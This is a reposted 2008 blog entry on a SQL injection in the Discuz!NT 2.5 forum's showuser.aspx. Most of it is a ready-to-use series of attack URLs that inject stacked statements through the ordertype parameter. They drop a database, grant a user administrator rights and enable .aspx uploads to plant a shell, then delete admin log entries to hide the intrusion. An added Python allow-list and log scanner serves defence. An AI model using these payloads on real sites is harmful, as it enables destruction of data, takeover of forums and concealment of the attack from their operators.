[Imported] Discuz!NT 2.5 showuser.aspx injection vulnerability

Spirit's blog ( http://www.fuckhacker.net/ ) :

http://www.*.com/bbs/showuser.aspx?ordertype=desc;drop database kj;--
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='1',groupid='1' where username='webtets';-- // promote to administrator
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='aspx' where extension='jpg';-- // change to aspx so it can be uploaded
After obtaining a shell...
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_attachtypes set extension='jpg' where extension='aspx';-- // change back to jpg
http://www.*.com/bbs/showuser.aspx?ordertype=desc;delete from dnt_adminvisitlog where username='webtets';-- // delete the log entries
http://www.*.com/bbs/showuser.aspx?ordertype=desc;update dnt_users set adminid='',groupid='' where username='webtets';-- // remove administrator rights
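
For defenders, an added example (not from the original post or from Discuz!NT's code): an allow-list check for `ordertype` and a scan of web server access logs for showuser.aspx requests that carry anything else, which matters because the requests above erase rows from dnt_adminvisitlog. It assumes `ordertype` is only ever meant to hold `asc` or `desc`; the log layout, sample lines and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: a sort direction is the only legitimate content of ordertype.
ALLOWED_ORDERTYPE = {"asc", "desc"}

# Constructed log layout: date time method uri-stem uri-query status
LOG_RE = re.compile(r"^(\S+ \S+) (\S+) (\S+) (\S+) (\d{3})$")

# Constructed sample lines, not taken from any real server.
SAMPLE_LOG = [
    "2008-12-01 10:01:12 GET /bbs/showuser.aspx ordertype=desc 200",
    "2008-12-01 10:02:40 GET /bbs/showuser.aspx ordertype=desc;select+1;-- 200",
    "2008-12-01 10:03:05 GET /bbs/showtopic.aspx topicid=5 200",
    "2008-12-01 10:03:09 GET /bbs/showuser.aspx ordertype=ASC&page=2 200",
]


def safe_ordertype(value, default="desc"):
    """Return a sort direction safe to use in ORDER BY, else the default."""
    v = (value or "").strip().lower()
    return v if v in ALLOWED_ORDERTYPE else default


def suspicious_requests(lines):
    """Return (timestamp, decoded ordertype) for showuser.aspx requests
    whose ordertype value is not on the allow-list."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, _method, stem, query, _status = m.groups()
        if not stem.lower().endswith("/showuser.aspx"):
            continue
        # Split on '&' only: ';' must stay inside the value, because it is
        # exactly what separates the stacked statement from the sort order.
        for pair in query.split("&"):
            key, _, raw = pair.partition("=")
            val = unquote_plus(raw)
            if key.lower() == "ordertype" and val.strip().lower() not in ALLOWED_ORDERTYPE:
                hits.append((ts, val))
    return hits


if __name__ == "__main__":
    for ts, val in suspicious_requests(SAMPLE_LOG):
        print(f"{ts} ordertype={val!r}")
```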


Article source: http://www.fuckhacker.net/?action=show&id=257
posted @ 2008-11-30 16:38  Vocoo